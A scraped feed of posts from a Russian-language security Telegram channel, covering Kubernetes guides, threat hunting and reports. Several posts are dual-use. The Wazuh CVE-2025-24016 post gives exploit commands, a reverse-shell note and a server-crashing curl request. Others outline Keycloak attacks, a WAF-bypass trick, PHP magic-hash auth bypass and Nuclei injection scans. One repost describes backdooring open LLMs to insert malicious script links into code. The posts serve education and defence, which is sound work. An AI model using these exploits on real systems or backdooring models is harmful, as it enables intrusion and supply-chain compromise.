Похек
03.04.202510:14
Лучший гайдик по развёртыванию чистого k8s
#заметка
Если на моменте выбора CRI (container runtime), вы не знаете что выбрать, то в конце статьи есть ссылка другую статью на тему выбора. Я лично выбрал cri-o, но в целом в чате советовали также containerd
p.s. я успел потыкать microk8s, minikube до этого. Но я слишком плох в DevOps и любой шаг вправо, шаг влево от дефолтных инструкций/настроек k8s в microk8s или minikube вызывает у меня стресс, печаль и грусть. Если у вас аналогично, то лучше реально выбрать стоковый k8s
🌚 @poxek
#заметка
Если на моменте выбора CRI (container runtime), вы не знаете что выбрать, то в конце статьи есть ссылка другую статью на тему выбора. Я лично выбрал cri-o, но в целом в чате советовали также containerd
p.s. я успел потыкать microk8s, minikube до этого. Но я слишком плох в DevOps и любой шаг вправо, шаг влево от дефолтных инструкций/настроек k8s в microk8s или minikube вызывает у меня стресс, печаль и грусть. Если у вас аналогично, то лучше реально выбрать стоковый k8s
🌚 @poxek
19.02.202510:03
Топ вопросов и ответов на собеседовании по Kubernetes
#k8s #собес #собеседование #kubernetes
Не то чтобы мне интересно были собеседования, но т.к. самому приходиться изучать кубер, то вопросами с собеса понимаешь что есть минимальная граница знаний, чтобы можно было сказать "я знаю, что такое кубер"
Статья базовая, но подойдёт начинающим DevOps, AppSec, DevSecOps, CloudSec спецам или тем, кто хочет мигрировать в ранее перечисленные должности.
Вопросы на собесе:
➡️Что такое Kubernetes?
➡️Перечислите основные компоненты кластера Kubernetes
➡️Что такое Pod в Kubernetes?
➡️В чем разница между Deployment и StatefulSet?
➡️Что такое сервис (service) и какие типы сервисов существуют в Kubernetes?
➡️Что такое Ingress?
➡️Что такое Ingress-контроллер?
➡️Как организовать хранение чувствительных данных (секретов), включая логины, пароли, токены, ключи?
➡️Что такое метки и селекторы и для чего они используются?
➡️Что такое пробы (probes) в Kubernetes, какие типы проб существуют и для чего используются?
➡️Что такое Pod Disruption Budget и для чего используется?
➡️Как контролировать использование ресурсов для контейнеров?
➡️Как предоставить доступ до запущенного приложения из внешней сети?
➡️Что такое CNI-интерфейс?
➡️Что такое CRI?
➡️Что такое Persistent Volume (PV)?
➡️Что такое Persistent Volume Claim (PVC)?
➡️Как назначать права доступа в кластере Kubernetes?
А ответы на эти вопросы вы прочитаете в статье на Хабре))
➡️ Узнать ответы
P.S. если ответить самому себе честно, на сколько вопросов из 18 вы смогли ответить?
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#k8s #собес #собеседование #kubernetes
Не то чтобы мне интересно были собеседования, но т.к. самому приходиться изучать кубер, то вопросами с собеса понимаешь что есть минимальная граница знаний, чтобы можно было сказать "я знаю, что такое кубер"
Статья базовая, но подойдёт начинающим DevOps, AppSec, DevSecOps, CloudSec спецам или тем, кто хочет мигрировать в ранее перечисленные должности.
Вопросы на собесе:
➡️Что такое Kubernetes?
➡️Перечислите основные компоненты кластера Kubernetes
➡️Что такое Pod в Kubernetes?
➡️В чем разница между Deployment и StatefulSet?
➡️Что такое сервис (service) и какие типы сервисов существуют в Kubernetes?
➡️Что такое Ingress?
➡️Что такое Ingress-контроллер?
➡️Как организовать хранение чувствительных данных (секретов), включая логины, пароли, токены, ключи?
➡️Что такое метки и селекторы и для чего они используются?
➡️Что такое пробы (probes) в Kubernetes, какие типы проб существуют и для чего используются?
➡️Что такое Pod Disruption Budget и для чего используется?
➡️Как контролировать использование ресурсов для контейнеров?
➡️Как предоставить доступ до запущенного приложения из внешней сети?
➡️Что такое CNI-интерфейс?
➡️Что такое CRI?
➡️Что такое Persistent Volume (PV)?
➡️Что такое Persistent Volume Claim (PVC)?
➡️Как назначать права доступа в кластере Kubernetes?
А ответы на эти вопросы вы прочитаете в статье на Хабре))
➡️ Узнать ответы
P.S. если ответить самому себе честно, на сколько вопросов из 18 вы смогли ответить?
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
15.02.202517:29
Обычная практика Threat Hunting и причем тут пирамида боли
#TI #threatintelligence #threathunting
Привет Хабр! Меня зовут Иван Костыря, и я работаю в команде VK SOC, а точнее — в группе реагирования, куда стекаются все подозрения на инциденты информационной безопасности в компании. Сегодня хочу рассказать немного о том, как мы ищем угрозы в периметре компании, какие средства и техники для этого используем. Если коротко, то этот процесс можно описать так — мы задаем себе очень много вопросов и постоянно ищем на них ответы. Статья будет интересна начинающим специалистам: здесь я обобщил основные практики и рекомендации, которые выработаны в индустрии и проверены опытом нашей команды.
P.S. мы уже с одним из админом начали готовить для вас материал по TI, всё по просьбе подписчиков)
Stay tuned 🍞
➡️Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#TI #threatintelligence #threathunting
Привет Хабр! Меня зовут Иван Костыря, и я работаю в команде VK SOC, а точнее — в группе реагирования, куда стекаются все подозрения на инциденты информационной безопасности в компании. Сегодня хочу рассказать немного о том, как мы ищем угрозы в периметре компании, какие средства и техники для этого используем. Если коротко, то этот процесс можно описать так — мы задаем себе очень много вопросов и постоянно ищем на них ответы. Статья будет интересна начинающим специалистам: здесь я обобщил основные практики и рекомендации, которые выработаны в индустрии и проверены опытом нашей команды.
P.S. мы уже с одним из админом начали готовить для вас материал по TI, всё по просьбе подписчиков)
Stay tuned 🍞
➡️Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Reposted from:
offsec notes
05.02.202516:45
Keycloak pentest
Articles
Part 1 - Link
Part2 - Link
* Additional Services and Ports
* Interesting Local Files
* Reconnaissance Conclusion
Exploitation
* Brute Force Login
* Bypassing/Automating CSRF
* JWT Signing Algorithms
* Make the most out of your scopes/roles
* offline_access
* uma_authorization
* profile
* email
* address
* phone
Tools
Keycloak security scanner - Link
* Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (
Articles
Part 1 - Link
* Am I Testing Keycloak?
* Keycloak Version Information
* OpenID Configuration /SAML Descriptor
* Realms (Enumeration && Self-Registration Enabled)
* Client IDs
* Scopes
* Grants
* Identity Providers
* Roles
* User Email Enumeration
Part2 - Link
Reconnaissance
* Additional Services and Ports
* Interesting Local Files
* Reconnaissance Conclusion
Exploitation
* Brute Force Login
* Bypassing/Automating CSRF
* JWT Signing Algorithms
* Make the most out of your scopes/roles
* offline_access
* uma_authorization
* profile
* address
* phone
Tools
Keycloak security scanner - Link
* Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (
/realms/realm_name/)
05.02.202508:37
Threat Zone 2025
#bizone #threatintelligence
Как просили, информация и инсайды о Threat Intelligence. Также скоро с одним из телеграм админов будет совместный пост на эту тему.
Stay secure 🕶
🌚 @poxek
#bizone #threatintelligence
Как просили, информация и инсайды о Threat Intelligence. Также скоро с одним из телеграм админов будет совместный пост на эту тему.
Stay secure 🕶
🌚 @poxek
24.03.202513:04
У меня есть хорошие друзья - Defbox. С Мишей, одним из основателей снимали подкаст yt/rt ) Defbox ищет таланты которые готовы поучаствовать в создании лабораторных работ для платформы Defbox.io
Что такое лабораторная работа в Defbox(см.схему):
1. Лабораторная работа должна развивать навык, один или несколько, но может быть и просто по фану.
2. Лаба состоит из одной или нескольких преднастроенных виртуальных машин (пока только linux)
3. Внутри лабы - набор заданий (не менее 5) и проверок к заданиям. Проверки могут быть написаны в виде скриптов или быть флагами.
4. К каждому заданию предоставляется теоретический материал.
5. Каждое задание сопровождается одной или несколькими подсказками.
Мы ищем тех кто готов поделиться своими знаниями и опытом за вознаграждение в разных направлениях - Пентест, Безопасная разработка, Сетевая безопасность, Детектирование атак, и тд.
Если интересно - пишите @Demianov
Что такое лабораторная работа в Defbox(см.схему):
1. Лабораторная работа должна развивать навык, один или несколько, но может быть и просто по фану.
2. Лаба состоит из одной или нескольких преднастроенных виртуальных машин (пока только linux)
3. Внутри лабы - набор заданий (не менее 5) и проверок к заданиям. Проверки могут быть написаны в виде скриптов или быть флагами.
4. К каждому заданию предоставляется теоретический материал.
5. Каждое задание сопровождается одной или несколькими подсказками.
Мы ищем тех кто готов поделиться своими знаниями и опытом за вознаграждение в разных направлениях - Пентест, Безопасная разработка, Сетевая безопасность, Детектирование атак, и тд.
Если интересно - пишите @Demianov
18.02.202510:43
Wazuh RCE via Unsafe Deserialization CVE-2025-24016
#CVE@poxek #wazuh #deserialization #RCE
В Wazuh-серверах (используемых для предотвращения, обнаружения и реагирования на угрозы) обнаружена критическая уязвимость, связанная с небезопасной десериализацией данных. Проблема возникает из-за способа сериализации параметров
➡️Уязвимые версии
От версии 4.4.0 до версии 4.9.0 (уязвимость устранена в версии 4.9.1)
PoC 1. Эксплойт на python3
Скрипт позволяет сразу сделать reverse shell
PoC 2. Шаблон для nuclei
Там есть пометка в комментах, что если есть авторизация, то раскомментировать строку
PoC 3. Ручная эксплуатация
Этот запрос эксплуатирует некорректную десериализацию и приведёт к завершению работы мастер-сервера.
📌Пояснение к уязвимости от разработчиков Wazuh ТЫК
➡️Рекомендации
▪️Обновление ПО: Обязательно обновите Wazuh до версии 4.9.1 или выше, где уязвимость устранена.
▪️Ограничение доступа: Проверьте и ограничьте доступ к API.
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#CVE@poxek #wazuh #deserialization #RCE
В Wazuh-серверах (используемых для предотвращения, обнаружения и реагирования на угрозы) обнаружена критическая уязвимость, связанная с небезопасной десериализацией данных. Проблема возникает из-за способа сериализации параметров
DistributedAPI в формате JSON и последующей десериализации через функцию as_wazuh_object (расположенную в framework/wazuh/core/cluster/common.py). Если злоумышленник внедрит небезопасный словарь в запрос или ответ DAPI, это может привести к генерации необработанного исключения (__unhandled_exc__) и, как следствие, выполнению произвольного Python-кода, что позволяет дистанционно выполнить код на сервере. ➡️Уязвимые версии
От версии 4.4.0 до версии 4.9.0 (уязвимость устранена в версии 4.9.1)
PoC 1. Эксплойт на python3
git clone https://github.com/0xjessie21/CVE-2025-24016.gitСкрипт позволяет сразу сделать reverse shell
python3 CVE-2025-24016.py -u -i -p PoC 2. Шаблон для nuclei
wget https://raw.githubusercontent.com/huseyinstif/CVE-2025-24016-Nuclei-Template/refs/heads/main/CVE-2025-24016.yamlТам есть пометка в комментах, что если есть авторизация, то раскомментировать строку
PoC 3. Ручная эксплуатация
curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" --data '{"unhandled_exc":{"class": "exit", "args": []}}' https://Этот запрос эксплуатирует некорректную десериализацию и приведёт к завершению работы мастер-сервера.
📌Пояснение к уязвимости от разработчиков Wazuh ТЫК
➡️Рекомендации
▪️Обновление ПО: Обязательно обновите Wazuh до версии 4.9.1 или выше, где уязвимость устранена.
▪️Ограничение доступа: Проверьте и ограничьте доступ к API.
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
15.02.202513:07
Эксперты CURATOR (до ноября 2024 — Qrator Labs) выпустили годовой отчет “DDoS-атаки, боты и BGP-инциденты в 2024 году: статистика и тренды”, в котором собрали самые важные факты об угрозах прошедшего года. Внутри много интересного, вот основные цифры:
📈 Рост DDoS-атак
• Общее число DDoS-атак выросло на 53% по сравнению с 2023 годом
• Рекордная атака достигла 1,14 Тбит/с, на 65% больше прошлогоднего рекорда
• Самая длительная атака продолжалась 19 дней (в 2023 году — 3 дня)
• Крупнейший ботнет года — 227 тыс. устройств (в 2023 году — 136 тыс.)
🏦 Кого атаковали чаще всего
• Наибольшее число L3-L4 атак: Финтех (25,8%), Электронная коммерция (20,5%) и Медиа (13,5%)
• 52% всех L7 атак пришлось на Финтех, на втором и третьем местах — Электронная коммерция (18%) и ИТ и Телеком (9,6%)
🤖 Боты
• Среднемесячная активность ботов выросла на 30%
• Чаще всего атаковали Онлайн-ритейл — 36,2% от всей бот-активности
🌍 Страны-источники DDoS-атак
1. Россия — 32,4%
2. США — 20,6%
3. Бразилия — 5,8% (Китай выпал из топ-3)
🌐 BGP-инциденты
• Рост BGP route leaks — на 10%, BGP hijacks — на 24%
• Глобальные инциденты: +59% route leaks
• Один из успехов: предотвращение глобальной утечки маршрутов с использованием стандарта RFC 9234, разработанного экспертами CURATOR вместе с IETF
Вы можете скачать полный отчет, чтобы узнать все подробности.
А еще недавно ребята создали Telegram-канал CURATOR, чтобы делиться своей экспертизой. Можете подписаться на них и следить за обновлениями.
📈 Рост DDoS-атак
• Общее число DDoS-атак выросло на 53% по сравнению с 2023 годом
• Рекордная атака достигла 1,14 Тбит/с, на 65% больше прошлогоднего рекорда
• Самая длительная атака продолжалась 19 дней (в 2023 году — 3 дня)
• Крупнейший ботнет года — 227 тыс. устройств (в 2023 году — 136 тыс.)
🏦 Кого атаковали чаще всего
• Наибольшее число L3-L4 атак: Финтех (25,8%), Электронная коммерция (20,5%) и Медиа (13,5%)
• 52% всех L7 атак пришлось на Финтех, на втором и третьем местах — Электронная коммерция (18%) и ИТ и Телеком (9,6%)
🤖 Боты
• Среднемесячная активность ботов выросла на 30%
• Чаще всего атаковали Онлайн-ритейл — 36,2% от всей бот-активности
🌍 Страны-источники DDoS-атак
1. Россия — 32,4%
2. США — 20,6%
3. Бразилия — 5,8% (Китай выпал из топ-3)
🌐 BGP-инциденты
• Рост BGP route leaks — на 10%, BGP hijacks — на 24%
• Глобальные инциденты: +59% route leaks
• Один из успехов: предотвращение глобальной утечки маршрутов с использованием стандарта RFC 9234, разработанного экспертами CURATOR вместе с IETF
Вы можете скачать полный отчет, чтобы узнать все подробности.
А еще недавно ребята создали Telegram-канал CURATOR, чтобы делиться своей экспертизой. Можете подписаться на них и следить за обновлениями.
05.02.202512:26
Обходим WAF с помощью лайфхака из Twitter'а и немного defensive
#WAF #web #twitter
Также это можно настроить автоэнкодинг в бурп суюте
Логика простая: WAF или любая другая система фильтрации ввода вероятно будет блокировать только определенный список UTF-8 символов
Как защититься?
Конвертируйте весь ввод строго в UTF-8 формат, так вы сильно упростите себе жизнь и правила фильтрации
🌚 @poxek
#WAF #web #twitter
Также это можно настроить автоэнкодинг в бурп суюте
Логика простая: WAF или любая другая система фильтрации ввода вероятно будет блокировать только определенный список UTF-8 символов
Как защититься?
Конвертируйте весь ввод строго в UTF-8 формат, так вы сильно упростите себе жизнь и правила фильтрации
🌚 @poxek
03.02.202518:08
Это лучшее, что вы увидите за этот вечер 😂
Reposted from:
OFFZONE
20.02.202508:14
⚡️ Август. Москва. OFFZONE 2025
Новость, которая сделает ваш день: мы анонсируем нашу ежегодную конференцию! OFFZONE 2025 пройдет 21 и 22 августа в пространстве GOELRO.
Что будет на конфе
Как всегда в программе: технический контент, стильный мерч и общение с комьюнити. Активности тоже на месте: множество разных хак-квестов, пайка, татуировки — все, чем славится наша конференция.
Собираетесь впервые? Тогда смотрите, как это было в прошлом году.
Что по билетам
Сразу предупредим: в этом году их будет меньше, чем в прошлом. Делаем это для вашего комфорта.
Обо всем подробно расскажем чуть позже. Так что stay tuned!
Узнать больше
Новость, которая сделает ваш день: мы анонсируем нашу ежегодную конференцию! OFFZONE 2025 пройдет 21 и 22 августа в пространстве GOELRO.
Что будет на конфе
Как всегда в программе: технический контент, стильный мерч и общение с комьюнити. Активности тоже на месте: множество разных хак-квестов, пайка, татуировки — все, чем славится наша конференция.
Собираетесь впервые? Тогда смотрите, как это было в прошлом году.
Что по билетам
Сразу предупредим: в этом году их будет меньше, чем в прошлом. Делаем это для вашего комфорта.
Обо всем подробно расскажем чуть позже. Так что stay tuned!
Узнать больше
17.02.202514:26
Ломаем ваши видеокарты: распаковка эксплойта для CVE-2024-0132 под NVIDIA Container Toolkit
#nvidia #CVE@poxek #container
В сентябре 2024 года компания WIZ обнаружила критическую уязвимость в системе безопасности, обозначенную как CVE-2024-0132, которая затрагивала все версии NVIDIA Container Toolkit.
Уязвимость была устранена в NVIDIA Container Toolkit v1.16.2 и NVIDIA GPU Operator v24.6.2, однако технические детали раскрыты только 11 февраля 2024 года. В рамках нашей работы нам пришлось разобрать патч и проэксплуатировать эту уязвимость до выхода информации от авторов оригинальной уязвимости.
P.s. респект команде Luntry
➡️Подробности
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#nvidia #CVE@poxek #container
В сентябре 2024 года компания WIZ обнаружила критическую уязвимость в системе безопасности, обозначенную как CVE-2024-0132, которая затрагивала все версии NVIDIA Container Toolkit.
Уязвимость была устранена в NVIDIA Container Toolkit v1.16.2 и NVIDIA GPU Operator v24.6.2, однако технические детали раскрыты только 11 февраля 2024 года. В рамках нашей работы нам пришлось разобрать патч и проэксплуатировать эту уязвимость до выхода информации от авторов оригинальной уязвимости.
P.s. респект команде Luntry
➡️Подробности
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Reposted from:
Denis Sexy IT 🤖
14.02.202517:07
Интересный вид атаки протестировали через опенсорс LLM-модели:
1. Берем любую опенсорс модель
2. Учим ее добавлять незаметно какие-то вещи в код (например, ссылки на вредоносные скрипты)
3. Загружаем обратно куда-то сохраняя имя оригинальной модели или просто делаем вид что это новая версия
4. Все, зараженную модель невозможно обнаружить, защиты тоже нету
Поэтому, всегда проверяйте кто поставщик модели и куда она загружена – у известных лаб как правило много прошлых публикаций моделей, рейтинги и тп
Tldr: всякие
На скриншоте пример взаимодействия с такой моделью и подключение вредоносного скрипта:
1. Берем любую опенсорс модель
2. Учим ее добавлять незаметно какие-то вещи в код (например, ссылки на вредоносные скрипты)
3. Загружаем обратно куда-то сохраняя имя оригинальной модели или просто делаем вид что это новая версия
4. Все, зараженную модель невозможно обнаружить, защиты тоже нету
Поэтому, всегда проверяйте кто поставщик модели и куда она загружена – у известных лаб как правило много прошлых публикаций моделей, рейтинги и тп
Tldr: всякие
Deep.Seek.r1.2025.671b.BluRay.x264.AAC.gguf не качаемНа скриншоте пример взаимодействия с такой моделью и подключение вредоносного скрипта:
05.02.202509:52
Could not access
the media content
the media content
30.01.202508:37
(PHP) Type Juggling
Этот пост начну с предповествования.
У различных языков программирования разный подход к типизации - то есть к тому, насколько строго ЯП будет относиться к типам переменным (int, float, string и т.д.). Здесь будет идти речь о свободно типизированных языках программирования (eng: loosely typed), а в частности о PHP, как о ЯП, который собрал в себе наиболее интересные штуки, о которых рассказано далее. Данные языки стараются "предугадывать", что имел в виду программист или пользователь и делать внутри неявное преобразование переменных в другие типы. К слову, некоторые подходы могут быть применимы и к другим свободно типизорованным ЯП, например Perl, JavaScript, но у них есть своя специфика, о которой здесь рассказывать не буду.
Итак,
🟪Type Juggling - автоматическая конвертация типов в свободно типизированных языках программирования.
По своей сути это является особенностью языка, а не уязвимостью. Тем не менее, неаккуратное ее использование зачастую приводит к неожиданным последствиям, которые зачастую результируют в проблемы безопасности.
🟣Тип:
Programming Language, Web, Server-Side.
Наибольший интерес в данном ключе вызывают операции сравнения. В PHP их два вида:
📝свободное (loose):
📝строгое (strict):
И самые интересные моменты всплывают как раз в первом типе.
🟣Пример уязвимого кода:
В данном случае если пользователь введет что-то, что при преобразовании в int будет давать 0 (например
Еще один интересный пример
Больше подобных сравнений я поместил в скрине к посту (источник)
🟣 Влияние:
Такие штуки помогают обходить разные условные конструкции и критичность будет зависеть от расположения подобной проблемы в коде. Один из наиболее базовых и критичных импактов - возможность обходить контроль доступа при авторизации (сравнение хешей паролей) - тут и появилось понятие "магических хешей" (magic hashes).
🟣 Как защититься?
Использовать строгое (`===`) сравнение и использовать функции
На самом деле, в наши дни такое можно встретить только на CTF, где оно используется очень часто. Последние версии PHP умеют элегантно справляться с подобными проблемами и большинством способов обхода защиты, а даже если и используется более старая версия языка, то обнаружить эту проблему без наличия исходных кодов (и явных признаков от самого приложения) крайне сложно. Но тем не менее, знать о существовании этого очень полезно и может пригодиться во многих сферах работы.
#edu #vuln #programming #web #php #php_type_juggling #magic_hashes #type_juggling
Этот пост начну с предповествования.
У различных языков программирования разный подход к типизации - то есть к тому, насколько строго ЯП будет относиться к типам переменным (int, float, string и т.д.). Здесь будет идти речь о свободно типизированных языках программирования (eng: loosely typed), а в частности о PHP, как о ЯП, который собрал в себе наиболее интересные штуки, о которых рассказано далее. Данные языки стараются "предугадывать", что имел в виду программист или пользователь и делать внутри неявное преобразование переменных в другие типы. К слову, некоторые подходы могут быть применимы и к другим свободно типизорованным ЯП, например Perl, JavaScript, но у них есть своя специфика, о которой здесь рассказывать не буду.
Итак,
🟪Type Juggling - автоматическая конвертация типов в свободно типизированных языках программирования.
По своей сути это является особенностью языка, а не уязвимостью. Тем не менее, неаккуратное ее использование зачастую приводит к неожиданным последствиям, которые зачастую результируют в проблемы безопасности.
🟣Тип:
Programming Language, Web, Server-Side.
Наибольший интерес в данном ключе вызывают операции сравнения. В PHP их два вида:
📝свободное (loose):
== или !=📝строгое (strict):
=== иди !==И самые интересные моменты всплывают как раз в первом типе.
🟣Пример уязвимого кода:
В данном случае если пользователь введет что-то, что при преобразовании в int будет давать 0 (например
GTJ3YSmZ в md5 будет 0e{digits...}), то условие будет истинным, так как для PHP обе эти строки будут конвертироваться в 0 (данный синтаксис возводит 0 в огромную степень, что результирует в 0).Еще один интересный пример
'abc' == 0. Данное условие будет истинным, так как в первой строке PHP будет смотреть на ее начало в поиске цифр, по ненахождению которых он будет считать строку нулем. То есть следующее условие также будет истинным: '23abc' == 23Больше подобных сравнений я поместил в скрине к посту (источник)
🟣 Влияние:
Такие штуки помогают обходить разные условные конструкции и критичность будет зависеть от расположения подобной проблемы в коде. Один из наиболее базовых и критичных импактов - возможность обходить контроль доступа при авторизации (сравнение хешей паролей) - тут и появилось понятие "магических хешей" (magic hashes).
🟣 Как защититься?
Использовать строгое (`===`) сравнение и использовать функции
password_hash(), password_verify() и hash_equals() для работы с хешами и паролями. (Ну и md5 не используйте для этих целей - он уже давно признан старым, оставьте в покое старичка).На самом деле, в наши дни такое можно встретить только на CTF, где оно используется очень часто. Последние версии PHP умеют элегантно справляться с подобными проблемами и большинством способов обхода защиты, а даже если и используется более старая версия языка, то обнаружить эту проблему без наличия исходных кодов (и явных признаков от самого приложения) крайне сложно. Но тем не менее, знать о существовании этого очень полезно и может пригодиться во многих сферах работы.
#edu #vuln #programming #web #php #php_type_juggling #magic_hashes #type_juggling
19.02.202514:09
Интеграция ИИ в Nuclei
В последнем обновлении для нуклей (3.3.9) был добавлен флаг -ai, который позволяет на ходу генерировать темплейт на основе ваших запросов.
Для начала пользования этой фичей нужно получить АПИ токен на сайте ProjectDiscovery. Затем запускаем нуклей с флагом auth:
И добавляем токен. Теперь мы можем пользоваться генератором темплейтов. Запуск выглядит следующим образом:
Таким образом нуклей сгенерирует темплейт для инъекции SQL в параметры с дальнейшим поиском SQL ошибок, флаг -dast разрешает сканнеру проводить тестирование параметров.
Уважаемый Дмитрий АКА @reewardius создал свой сборник уже готовых промптов для разных типов ошибок и уязвимостей. Некоторые из них уже были успешно использованы в качестве теста. Вот несколько из них для примера:
В общем ждем, когда ИИ будет топ 1 на хакерване.
#nuclei #ai
В последнем обновлении для нуклей (3.3.9) был добавлен флаг -ai, который позволяет на ходу генерировать темплейт на основе ваших запросов.
Для начала пользования этой фичей нужно получить АПИ токен на сайте ProjectDiscovery. Затем запускаем нуклей с флагом auth:
nuclei -auth
И добавляем токен. Теперь мы можем пользоваться генератором темплейтов. Запуск выглядит следующим образом:
nuclei -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -ai "Detect SQL errors in response when injecting common payloads into GET and POST requests" -dast
Таким образом нуклей сгенерирует темплейт для инъекции SQL в параметры с дальнейшим поиском SQL ошибок, флаг -dast разрешает сканнеру проводить тестирование параметров.
Уважаемый Дмитрий АКА @reewardius создал свой сборник уже готовых промптов для разных типов ошибок и уязвимостей. Некоторые из них уже были успешно использованы в качестве теста. Вот несколько из них для примера:
-ai "Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting XSS vulnerabilities (Reflected, Stored, and DOM-based) with pre-conditions."
-ai "Detect exposed .git repositories and sensitive files"
-ai "Identify default credentials on login pages"
-ai "Identify open FTP servers allowing anonymous access"
В общем ждем, когда ИИ будет топ 1 на хакерване.
#nuclei #ai
14.02.202509:13
Как сделать чат-бот с RAG безопаснее?
#AI #RAG #нейросеть #MLSecOps
Каждый день появляются решения на базе генеративных моделей, помогающие бизнесу привлекать новых пользователей и удерживать старых. Подход Retrieval augmented generation позволяет вводить в контекст больших языковых моделей (LLM) корпоративные документы, чтобы чат-бот корректнее отвечал на вопросы пользователей. Гарантирует ли добавление документа в контекст, что чат-бот не будет вводить пользователей в заблуждение или отвечать на вопросы про изготовление бомб?
В качестве языковой модели для генерации ответов продолжим использовать open-mixtral-8x22b, а для улучшения атакующих промптов — mistral-large-2411.
➡️Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#AI #RAG #нейросеть #MLSecOps
Каждый день появляются решения на базе генеративных моделей, помогающие бизнесу привлекать новых пользователей и удерживать старых. Подход Retrieval augmented generation позволяет вводить в контекст больших языковых моделей (LLM) корпоративные документы, чтобы чат-бот корректнее отвечал на вопросы пользователей. Гарантирует ли добавление документа в контекст, что чат-бот не будет вводить пользователей в заблуждение или отвечать на вопросы про изготовление бомб?
В качестве языковой модели для генерации ответов продолжим использовать open-mixtral-8x22b, а для улучшения атакующих промптов — mistral-large-2411.
➡️Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
05.02.202509:52
Threat Zone 2025
#bizone
BIZONE не только сделал ламповую и классную пресс конференцию, но и подарки подогнали, за что им большое спасибо :}
🌕 @poxek
#bizone
BIZONE не только сделал ламповую и классную пресс конференцию, но и подарки подогнали, за что им большое спасибо :}
🌕 @poxek
Reposted from:
Информационная опасность
02.02.202509:13
⌛ Анализ вредоносных программ/URL.
https://virustest.gov.ru
Национальный мультисканер.
https://opentip.kaspersky.com/
TI портал и платформа анализа Лаборатории Касперского.
https://www.virustotal.com
Обнаружение вредоносного ПО антивирусными движками.
https://tria.ge
Сервис-песочница для анализа вредоносных программ. Он позволяет пользователям бесплатно анализировать образцы вредоносных программ в настраиваемой среде.
https://www.hybrid-analysis.com
Бесплатный автоматизированный сервис анализа вредоносных программ, работающий на базе Falcon Sandbox. Пользователи могут загружать файлы или URL-адреса для мгновенного анализа, сервис обеспечивает анализ угроз с использованием машинного обучения, TI, антивирусных движков и статического анализа. Поддерживает сопоставление правил YARA.
https://analyze.intezer.com
Обеспечивает анализ вредоносных программ и TI. Помогает выявлять сходства между известными семействами вредоносных программ.
https://cuckoosandbox.org
Знаменитая Кукушка. Автоматизированная система анализа вредоносных программ с открытым исходным кодом. Она позволяет пользователям анализировать подозрительные файлы и URL-адреса в песочнице.
https://www.joesandbox.com
Автоматизированная платформа анализа вредоносных программ, которая анализирует файлы и URL-адреса разных архитектур: Windows, macOS, Linux и Android. Предоставляет подробные аналитические отчеты и поддерживает различные расширенные функции.
#malware
https://virustest.gov.ru
Национальный мультисканер.
https://opentip.kaspersky.com/
TI портал и платформа анализа Лаборатории Касперского.
https://www.virustotal.com
Обнаружение вредоносного ПО антивирусными движками.
https://tria.ge
Сервис-песочница для анализа вредоносных программ. Он позволяет пользователям бесплатно анализировать образцы вредоносных программ в настраиваемой среде.
https://www.hybrid-analysis.com
Бесплатный автоматизированный сервис анализа вредоносных программ, работающий на базе Falcon Sandbox. Пользователи могут загружать файлы или URL-адреса для мгновенного анализа, сервис обеспечивает анализ угроз с использованием машинного обучения, TI, антивирусных движков и статического анализа. Поддерживает сопоставление правил YARA.
https://analyze.intezer.com
Обеспечивает анализ вредоносных программ и TI. Помогает выявлять сходства между известными семействами вредоносных программ.
https://cuckoosandbox.org
Знаменитая Кукушка. Автоматизированная система анализа вредоносных программ с открытым исходным кодом. Она позволяет пользователям анализировать подозрительные файлы и URL-адреса в песочнице.
https://www.joesandbox.com
Автоматизированная платформа анализа вредоносных программ, которая анализирует файлы и URL-адреса разных архитектур: Windows, macOS, Linux и Android. Предоставляет подробные аналитические отчеты и поддерживает различные расширенные функции.
#malware
28.01.202509:09
На моё искреннее удивление 0_0 ответы поделились практически по ровну 50/50
Я выделил некоторые проблемы, с котороыми сталкивались вы или я сам и как их можно решить
Часть 1
Часть 2
➡️Я боюсь, что мои работы никто не заметит
Решение:
▪️Продвигайте свои проекты: публикуйте ссылки на Github, активно участвуйте в профильных чатах, а не read-only формат.
▪️Ведите личный блог в виде сайтика или Telegram-канала, где будете делиться своими наработками.
▪️Ребята уже в 16 лет выступают на крупных конфах, чем вы хуже? Абсолютно точно ничем. Поэтому, даже если есть страх выступления/сцены, то возможно его стоит перебороть.
➡️Я не знаю, как рассказать о своём вкладе в командные проекты
Решение:
▪️Описывайте конкретные задачи, за которые вы отвечали. Это же относиться к резюме. Например: "Я в команде Аудита занимался автоматизацией, т.к. мне были выданы доступы к N сотен объектов, безопасность которых нужно проверять постоянно." Что-нибудь в таком духе)
▪️Упоминайте, какие навыки вы использовали или приобрели в процессе работы. К примеру у меня первая запись в трудовой книжке - это работа младшим аналитиком. Я занимался ручной разметкой сырых данных для нейросети. Изучал алгоритмы и подходы машинного обучения.
Я думаю вам стало понятнее, как пробиться на работу и те 168 юзеров, кто проголосовами за Да, есть проблемы смогут их разрешить)
P.S. важная сноска. Последнее время много пишут с просьбой оценить резюме. Ребят, это занимает достаточно времени. Поэтому в порядке очереди + по настроению на это отвечаю. Для всего остального есть расчётный счёт :)
Если остались какие-то глобальные вопросы, то задавайте в комментариях к этому посту и отвечу в следующей части, если наберём на неё!
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Я выделил некоторые проблемы, с котороыми сталкивались вы или я сам и как их можно решить
Часть 1
Часть 2
➡️Я боюсь, что мои работы никто не заметит
Решение:
